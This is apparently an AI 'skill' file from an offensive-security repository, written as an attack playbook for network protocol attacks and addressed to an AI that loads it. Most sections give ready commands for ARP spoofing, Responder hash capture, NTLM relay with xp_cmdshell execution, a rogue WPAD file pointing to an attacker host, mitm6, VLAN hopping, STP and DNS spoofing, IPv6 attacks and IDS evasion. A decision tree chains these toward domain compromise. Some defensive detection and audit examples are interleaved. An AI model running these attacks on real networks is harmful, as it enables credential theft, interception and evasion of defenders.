SKILL: Network Protocol Attacks — Expert Attack Playbook
AI LOAD INSTRUCTION: Expert network protocol attack techniques. Covers ARP spoofing, name resolution poisoning (LLMNR/NBT-NS/mDNS), WPAD abuse, DHCPv6 takeover, VLAN hopping, STP manipulation, DNS spoofing, IPv6 attacks, and IDS/IPS evasion. Base models miss the chaining opportunities between these attacks and the nuances of modern switched network exploitation.
0. RELATED ROUTING
Before going deep, consider loading:
- tunneling-and-pivoting after establishing MitM position for traffic redirection
- ntlm-relay-coercion for relaying captured NTLM hashes from poisoning attacks
- unauthorized-access-common-services for exploiting services discovered during network attacks
- traffic-analysis-pcap for analyzing captured traffic from MitM
Advanced Reference
Also load NAME_RESOLUTION_POISONING.md when you need:
- Detailed Responder/mitm6 configuration and workflows
- NTLM relay target selection and chaining
- Credential format analysis and cracking priorities
1. ARP SPOOFING
Gratuitous ARP — MitM Positioning
```bash
# arpspoof (dsniff suite)
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t VICTIM_IP GATEWAY_IP &
arpspoof -i eth0 -t GATEWAY_IP VICTIM_IP &

# ettercap — ARP poisoning with sniffing
ettercap -T -q -i eth0 -M arp:remote /VICTIM_IP// /GATEWAY_IP//

# bettercap — modern framework
bettercap -iface eth0
> set arp.spoof.targets VICTIM_IP
> arp.spoof on
> net.sniff on
```
Selective Targeting
```bash
# bettercap — target specific hosts, avoid detection
> set arp.spoof.targets 10.0.0.50,10.0.0.51
> set arp.spoof.fullduplex true
> set arp.spoof.internal true
> arp.spoof on
```
Detection Indicators
- Duplicate MAC addresses in ARP table
- Gratuitous ARP storms from non-gateway IPs
- Tools/controls: arpwatch, static ARP entries, 802.1X port authentication
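The detection indicators above, as an added example that is not part of the original playbook: a detector run over constructed ARP reply records. The tuple layout, `detect_arp_spoof` and its thresholds are assumptions of this example; a live deployment would feed it from a sniffer or an arpwatch log.

```python
"""Flag the ARP-spoofing indicators listed above over a stream of ARP replies:
an IP whose MAC changes, one MAC claiming several IPs, and bursts of
gratuitous ARP (sender IP == target IP). Added example; records are constructed."""
from collections import defaultdict

# Constructed sample: (timestamp_s, sender_ip, sender_mac, target_ip)
SAMPLE_ARP = [
    (0.0, "10.0.0.1",  "aa:aa:aa:aa:aa:01", "10.0.0.50"),  # real gateway answers the host
    (0.5, "10.0.0.50", "bb:bb:bb:bb:bb:50", "10.0.0.1"),   # host answers the gateway
    (5.0, "10.0.0.1",  "cc:cc:cc:cc:cc:99", "10.0.0.1"),   # gratuitous ARP: gateway IP, new MAC
    (5.2, "10.0.0.50", "cc:cc:cc:cc:cc:99", "10.0.0.50"),  # same MAC now also claims the host
    (5.4, "10.0.0.1",  "cc:cc:cc:cc:cc:99", "10.0.0.1"),
    (5.6, "10.0.0.1",  "cc:cc:cc:cc:cc:99", "10.0.0.1"),
    (5.8, "10.0.0.1",  "cc:cc:cc:cc:cc:99", "10.0.0.1"),
]

def detect_arp_spoof(records, gateway_ip, known=None, window=2.0, burst=4):
    """Return (kind, subject, detail) alerts in the order they are raised.
    known: trusted IP->MAC seed (e.g. static entries) so the first flip is caught."""
    ip_to_mac = dict(known or {})
    mac_to_ips = defaultdict(set)
    grat = defaultdict(list)        # sender_ip -> recent gratuitous-ARP timestamps
    flagged, alerts = set(), []
    for ts, sip, smac, tip in records:
        old = ip_to_mac.get(sip)
        if old is not None and old != smac:
            scope = "gateway" if sip == gateway_ip else "host"
            alerts.append(("ip_mac_flip", sip, f"{old} -> {smac} ({scope})"))
        ip_to_mac[sip] = smac
        mac_to_ips[smac].add(sip)
        if len(mac_to_ips[smac]) > 1 and smac not in flagged:
            flagged.add(smac)
            alerts.append(("mac_multi_ip", smac, sorted(mac_to_ips[smac])))
        if sip == tip:                  # gratuitous ARP
            grat[sip] = [t for t in grat[sip] if ts - t <= window] + [ts]
            if len(grat[sip]) == burst:
                alerts.append(("grat_arp_burst", sip, f"{burst} in {window}s"))
    return alerts

if __name__ == "__main__":
    for alert in detect_arp_spoof(SAMPLE_ARP, gateway_ip="10.0.0.1"):
        print(*alert)
```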
2. LLMNR / NBT-NS / mDNS POISONING
Responder — Credential Capture
```bash
# Basic poisoning (LLMNR + NBT-NS + mDNS)
responder -I eth0 -dwPv
# Key flags:
#   -d  Enable answers for DHCP broadcast requests (fingerprinting)
#   -w  Start WPAD rogue proxy
#   -P  Force NTLM auth for WPAD
#   -v  Verbose

# Analyze mode only (passive, no poisoning)
responder -I eth0 -A
```
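A defender's complement to the Responder commands above, added here and not from the original playbook: an LLMNR canary check that queries a name which cannot exist on the LAN and treats any positive answer as a poisoner. The packet builder, the parser and the constructed reply are this example's own; for a live check, send the `build_llmnr_query` output over UDP to 224.0.0.252:5355 and pass each reply received to `parse_llmnr_reply`.

```python
"""LLMNR canary check: query a name that cannot exist on the LAN; any positive
answer comes from a poisoner. Added example, not from the original playbook;
the sample reply is constructed."""
import socket
import struct

LLMNR = ("224.0.0.252", 5355)   # LLMNR multicast group and port (RFC 4795)

def encode_name(name):
    return b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"

def build_llmnr_query(name, txid):
    # DNS-style header (ID, flags=0, QDCOUNT=1) followed by one A/IN question
    return struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0) + encode_name(name) + b"\x00\x01\x00\x01"

def skip_name(data, off):
    while data[off]:
        if data[off] & 0xC0 == 0xC0:        # compression pointer ends the name
            return off + 2
        off += data[off] + 1
    return off + 1

def parse_llmnr_reply(data, txid):
    """IPv4 addresses in a positive reply to our txid, else []."""
    if len(data) < 12:
        return []
    rid, flags, qd, an, _, _ = struct.unpack("!HHHHHH", data[:12])
    if rid != txid or not flags & 0x8000 or an == 0:
        return []
    off = 12
    for _ in range(qd):
        off = skip_name(data, off) + 4      # question: name, QTYPE, QCLASS
    ips = []
    for _ in range(an):
        off = skip_name(data, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", data[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:
            ips.append(socket.inet_ntoa(data[off:off + 4]))
        off += rdlen
    return ips

# Constructed positive reply to txid 0x1234: QR bit set, question echoed, one A answer 10.0.0.99
CONSTRUCTED_REPLY = (bytes.fromhex("1234 8000 0001 0001 0000 0000") + encode_name("canary-deadbeef")
                     + bytes.fromhex("0001 0001") + bytes.fromhex("c00c 0001 0001 0000001e 0004 0a000063"))
```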
Captured Hash Formats
| Protocol | Hash Type | Hashcat Mode | Crackability |
|---|---|---|---|
| NTLMv1 | NetNTLMv1 | 5500 | Fast — rainbow tables viable |
| NTLMv2 | NetNTLMv2 | 5600 | Moderate — dictionary + rules |
| NTLMv1-ESS | NetNTLMv1 | 5500 | Fast — same as NTLMv1 |
```bash
# Crack captured hashes
hashcat -m 5600 hashes.txt wordlist.txt -r rules/best64.rule
john --format=netntlmv2 hashes.txt --wordlist=wordlist.txt
```
Relay Instead of Crack
```bash
# ntlmrelayx — relay captured NTLM to other services
ntlmrelayx.py -tf targets.txt -smb2support
ntlmrelayx.py -t ldaps://DC01 --delegate-access   # RBCD attack
ntlmrelayx.py -t mssql://DB01 -q "exec xp_cmdshell 'whoami'"
```
3. WPAD ABUSE
```bash
# Responder with WPAD proxy
responder -I eth0 -wPv
# WPAD flow:
#   1. Client queries DHCP for WPAD → DNS for wpad.domain.com → LLMNR/NBT-NS
#   2. Responder answers with rogue wpad.dat
#   3. Browser uses attacker's proxy → forced NTLM auth → credential capture
```
Manual WPAD PAC File
```javascript
// Rogue wpad.dat content
function FindProxyForURL(url, host) {
    return "PROXY ATTACKER_IP:3128; DIRECT";
}
```
4. DHCPv6 ATTACK — mitm6
Even on IPv4-only networks, Windows clients send DHCPv6 solicitations by default.
```bash
# mitm6 → DNS takeover → NTLM relay
mitm6 -d domain.com
# In parallel: relay captured NTLM to LDAP(S) for delegation
ntlmrelayx.py -6 -t ldaps://DC01 -wh fakewpad.domain.com -l loot --delegate-access
# Attack chain:
#   1. mitm6 answers DHCPv6 → sets attacker as IPv6 DNS
#   2. Victim DNS queries go to attacker → WPAD redirect
#   3. Forced NTLM auth → relay to LDAP → create machine account or RBCD
```
Key Conditions
- SMB signing disabled on targets (for SMB relay)
- LDAP signing not enforced on DC (for LDAP relay)
- Domain Computers quota > 0 (for machine account creation, default: 10)
5. VLAN HOPPING
Switch Spoofing (DTP)
```bash
# yersinia — DTP attack to negotiate trunk
yersinia dtp -attack 1 -interface eth0
# frogger.sh — automated VLAN hopping via DTP
./frogger.sh
# Sends DTP frames → switch enables trunking → access all VLANs

# After trunk established:
modprobe 8021q
vconfig add eth0 TARGET_VLAN
ifconfig eth0.TARGET_VLAN 10.10.10.1 netmask 255.255.255.0 up
```
Double Tagging (802.1Q)
```python
# Craft double-tagged frame: outer=native VLAN, inner=target VLAN (scapy)
from scapy.all import *
pkt = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=100)/IP(dst="TARGET")/ICMP()
sendp(pkt, iface="eth0")
# Limitation: one-way only (responses go to real gateway)
# Effective for blind attacks (e.g., targeting a server)
```
Mitigation
- Disable DTP: `switchport nonegotiate`
- Set native VLAN to unused: `switchport trunk native vlan 999`
- Prune VLANs: only allow needed VLANs on trunk ports
6. STP MANIPULATION
Root Bridge Claim
```bash
# yersinia — claim root bridge with lowest priority
yersinia stp -attack 4 -interface eth0
# Send BPDUs with priority 0 → become root bridge
# All traffic flows through attacker → MitM
```
Topology Change Attack
```bash
# Send TC (Topology Change) BPDUs → force MAC table flush
yersinia stp -attack 1 -interface eth0
# Switches flood all ports temporarily → sniff traffic
```
Mitigation
- BPDU Guard on access ports: `spanning-tree portfast bpduguard enable`
- Root Guard on designated ports
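As an added example covering the VLAN-hopping (§5) and STP (§6) mitigations, not code from the original playbook: a config audit that reads an IOS-style running-config and reports ports where those mitigations are missing. The config text is constructed, `audit_switch_config` is this example's own name, and it checks the interface-level `spanning-tree bpduguard enable` form.

```python
"""Audit an IOS-style running-config for the §5/§6 mitigations: negotiable DTP, trunks
without 'switchport nonegotiate', native VLAN 1, unpruned trunks, PortFast without BPDU Guard."""

CONSTRUCTED_CONFIG = """\
interface GigabitEthernet1/0/1
 switchport mode access
 spanning-tree portfast
 spanning-tree bpduguard enable
!
interface GigabitEthernet1/0/2
 switchport mode dynamic desirable
 spanning-tree portfast
!
interface GigabitEthernet1/0/24
 switchport mode trunk
 switchport trunk native vlan 1
 switchport nonegotiate
!
"""

def parse_interfaces(config):
    blocks, cur = {}, None                     # interface name -> its sub-commands
    for line in config.splitlines():
        if line.startswith("interface "):
            cur = line.split(None, 1)[1]
            blocks[cur] = []
        elif cur and line.startswith(" "):
            blocks[cur].append(line.strip())
        else:
            cur = None                         # '!' or any top-level line ends the block
    return blocks

def audit_switch_config(config):
    """Return (interface, finding) pairs, in config order."""
    findings = []
    for name, lines in parse_interfaces(config).items():
        mode = next((l.split()[2] for l in lines if l.startswith("switchport mode ")), None)
        if mode in (None, "dynamic"):          # IOS default is dynamic auto: DTP can negotiate a trunk
            findings.append((name, "DTP negotiable: set an explicit mode"))
        if mode == "trunk":
            if "switchport nonegotiate" not in lines:
                findings.append((name, "trunk still sends DTP: add 'switchport nonegotiate'"))
            native = next((l.split()[-1] for l in lines if l.startswith("switchport trunk native vlan ")), "1")
            if native == "1":
                findings.append((name, "native VLAN 1 on trunk: move it to an unused VLAN"))
            if not any(l.startswith("switchport trunk allowed vlan ") for l in lines):
                findings.append((name, "trunk carries all VLANs: prune to the ones needed"))
        elif "spanning-tree portfast" in lines and "spanning-tree bpduguard enable" not in lines:
            findings.append((name, "PortFast without BPDU Guard: a rogue BPDU can reshape STP"))
    return findings
```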
7. DNS SPOOFING
DNS Cache Poisoning
```bash
# bettercap DNS spoofing
bettercap -iface eth0
> set dns.spoof.domains target.com, *.target.com
> set dns.spoof.address ATTACKER_IP
> dns.spoof on

# ettercap DNS spoofing (via etter.dns config)
echo "target.com A ATTACKER_IP" >> /etc/ettercap/etter.dns
ettercap -T -q -i eth0 -P dns_spoof -M arp:remote /VICTIM// /GATEWAY//
```
Kaminsky Attack Variant
Flood the recursive resolver with forged responses for random subdomains, each carrying a malicious authority section that points the zone's NS record at an attacker-controlled server.
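What a hardened resolver does with that flood, as an added example not from the original playbook: a reply must match the outstanding query's transaction ID, source port and exact (0x20-cased) question before anything in it is considered, and records outside the queried zone's bailiwick are discarded rather than cached. The dict layout, `validate_response` and the constructed records are assumptions of this example.

```python
"""Resolver-side acceptance for replies during a Kaminsky-style flood:
transaction ID, source port and the exact question must match, and out-of-
bailiwick records are never cached. Added example; records are constructed."""

def in_bailiwick(name, zone):
    """True if name is zone itself or lies below it."""
    name, zone = name.rstrip(".").lower(), zone.rstrip(".").lower()
    return name == zone or name.endswith("." + zone)

def validate_response(query, response, zone):
    """query/response: dicts with txid, port, question and (response only) the
    answer/authority/additional sections as (name, type, rdata) tuples.
    Returns (accepted, cacheable_records, reasons)."""
    reasons = []
    if response["txid"] != query["txid"]:
        reasons.append("txid mismatch")
    if response["port"] != query["port"]:
        reasons.append("source port mismatch")
    if response["question"] != query["question"]:   # exact: 0x20 case randomization must round-trip
        reasons.append("question mismatch")
    if reasons:
        return False, [], reasons          # a flood shows up as a stream of these
    cacheable = []
    for section in ("answer", "authority", "additional"):
        for name, rtype, rdata in response.get(section, []):
            if not in_bailiwick(name, zone):
                reasons.append(f"dropped out-of-bailiwick {rtype} {name} from {section}")
                continue
            cacheable.append((name, rtype, rdata))
    return True, cacheable, reasons

# Constructed: our outstanding query (random-cased label, random port and txid) and a forged reply
OUTSTANDING = {"txid": 0x4A3F, "port": 41123, "question": "xK9q2.TaRgEt.cOm"}
FORGED = {"txid": 0x4A3F, "port": 41123, "question": "xK9q2.TaRgEt.cOm",
          "answer": [],
          "authority": [("target.com", "NS", "ns.attacker.example")],
          "additional": [("ns.attacker.example", "A", "203.0.113.7")]}   # glue for a foreign host
```

Only a reply that guessed all three values correctly gets this far, and even then the foreign glue is dropped, so the resolver must look up the new NS host on its own rather than trusting the address the flood supplied.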
8. IPv6 ATTACKS
Router Advertisement Spoofing
```bash
# Send rogue RA → victim configures attacker as default gateway
atk6-fake_router6 eth0 ATTACKER_IPV6_PREFIX/64
# THC-IPv6 suite for comprehensive IPv6 attacks
atk6-parasite6 eth0      # ICMPv6 neighbor spoofing
atk6-redir6 eth0 ...     # Traffic redirection via ICMPv6 redirect
```
SLAAC Abuse
```bash
# Advertise rogue prefix → victim auto-configures IPv6 address
# Combined with rogue DNS (RA option) → full MitM over IPv6
# Windows prioritizes IPv6 over IPv4 by default
```
9. IDS/IPS EVASION
| Technique | Method | Tool/Flag |
|---|---|---|
| IP Fragmentation | Split payload across fragments | nmap -f, fragroute |
| TTL Manipulation | Set TTL to expire at IDS but reach target | fragroute |
| Encoding Evasion | URL/Unicode/hex encoding | Manual, custom scripts |
| Session Splicing | Split TCP payload across segments | fragroute, nmap --data-length |
| Timing-Based | Slow scan to avoid rate-based detection | nmap -T0, nmap -T1 |
| Decoy Scanning | Mix real scan with decoy source IPs | nmap -D RND:10 |
| Idle/Zombie Scan | Use idle host as scan proxy | nmap -sI ZOMBIE_IP |
```bash
# fragroute — fragment and reorder packets
echo "ip_frag 8" > /tmp/frag.conf
echo "order random" >> /tmp/frag.conf
fragroute -f /tmp/frag.conf TARGET_IP

# nmap evasion combinations
nmap -sS -f --mtu 24 --data-length 50 -D RND:5 -T2 TARGET
```
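The reassembly an inspection engine has to perform against the fragmentation rows of the table above, as an added example not from the original playbook: it rebuilds the stream from constructed fragments and flags the tiny (`ip_frag 8`, `nmap -f`) and overlapping fragments the evasion relies on. `reassemble` and the fragment tuple layout are this example's own.

```python
"""Reassemble IP fragments the way an inspection engine must, and flag the two
tricks the evasion table relies on: tiny fragments (fragroute 'ip_frag 8',
nmap -f) and overlapping fragments whose bytes disagree. Added example, not from
the original playbook; the fragment list is constructed."""

# Constructed fragments: (byte_offset, more_fragments, payload); offsets are multiples of 8
CONSTRUCTED_FRAGS = [
    (0,  True,  b"GET /ind"),
    (8,  True,  b"ex.html "),
    (16, False, b"HTTP/1.0"),
    (8,  True,  b"ex.php  "),   # overlaps offset 8 with different bytes
]

def reassemble(frags, policy="first", tiny=8):
    """Return (payload, alerts). policy 'first' keeps the earlier copy of an
    overlapped byte, 'last' the later one; real stacks differ, which is the evasion."""
    buf, seen, alerts = bytearray(), bytearray(), []
    for off, more, payload in sorted(frags, key=lambda f: f[0]):  # stable: ties keep arrival order
        end = off + len(payload)
        if more and len(payload) <= tiny:
            alerts.append(("tiny_fragment", off, len(payload)))
        if end > len(buf):
            pad = end - len(buf)
            buf += bytes(pad)
            seen += bytes(pad)
        overlap = [p for p in range(off, end) if seen[p]]
        if overlap:
            conflict = any(buf[p] != payload[p - off] for p in overlap)
            alerts.append(("overlap", off, conflict))
        for p in range(off, end):
            if not seen[p] or policy == "last":
                buf[p] = payload[p - off]
            seen[p] = 1
    return bytes(buf), alerts
```

An engine that reassembles with one policy while the target host uses the other sees a different request than the host does, which is why a conflicting overlap is worth an alert on its own.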
10. DECISION TREE
```text
Network access obtained — want to escalate via network attacks
│
├── On same broadcast domain as targets?
│   ├── YES → ARP spoof for MitM (§1)
│   │   └── Capture plaintext creds or redirect traffic
│   └── NO → need VLAN hopping first (§5)
│       ├── DTP enabled? → switch spoofing
│       └── Know native VLAN? → double tagging
│
├── Windows environment?
│   ├── LLMNR/NBT-NS enabled? (default YES)
│   │   └── Run Responder (§2) → capture NetNTLM hashes
│   │       ├── NTLMv1? → crack fast or relay
│   │       └── NTLMv2? → relay (§2) or crack with rules
│   │
│   ├── WPAD configured or auto-detect? → WPAD abuse (§3)
│   │
│   └── IPv6 not hardened? (default) → mitm6 + ntlmrelayx (§4)
│       └── LDAP relay → RBCD → domain compromise
│
├── Need DNS control?
│   ├── MitM already established? → DNS spoofing (§7)
│   └── DHCPv6 available? → mitm6 for DNS takeover (§4)
│
├── Managed switches with weak config?
│   ├── BPDU Guard off? → STP root bridge claim (§6)
│   └── DTP enabled? → VLAN hopping (§5)
│
├── IPv6 attack surface?
│   └── RA spoofing / SLAAC abuse (§8) → MitM over IPv6
│
└── IDS/IPS in path?
    └── Apply evasion techniques (§9) — fragmentation, timing, encoding
```
Repository: yaklang/hack-skills (GitHub)